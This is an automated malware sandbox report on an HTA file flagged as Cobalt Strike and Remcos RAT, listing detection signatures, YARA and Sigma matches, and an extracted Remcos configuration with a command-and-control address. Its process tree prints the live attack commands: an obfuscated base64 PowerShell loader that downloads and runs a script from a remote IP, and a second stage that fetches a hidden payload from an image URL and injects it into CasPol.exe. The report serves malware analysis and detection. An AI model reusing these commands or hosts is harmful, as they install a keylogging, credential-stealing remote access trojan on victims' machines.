Windows
Analysis Report
verynicegirlwalkingarounftheworldmuuuah.hta
Overview
General Information
Detection
Cobalt Strike, Remcos
Field | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7236 cmdline: mshta.exe "C:\Users\user\Desktop\verynicegirlwalkingarounftheworldmuuuah.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 7348 cmdline: "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7392 cmdline: POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 7560 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8DF2.tmp" "c:\Users\user\AppData\Local\Temp\2qf3pwzp\CSCB3A240E1501D48929A893BA197F62C4E.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 7600 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
- powershell.exe (PID: 7652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform', 'TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- CasPol.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- CasPol.exe (PID: 8132 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aockdegvxmbvbenvzdaftknehua" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- CasPol.exe (PID: 8140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\kihdewrolutadkbziovgwxanibscod" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- CasPol.exe (PID: 8160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nkmnepbqzclnnyxdazhahcueqhcdhonmrf" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
{"Host:Port:Password": ["172.245.123.12:8690:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ET2B3I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
REMCOS_RAT_variants | unknown | unknown | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |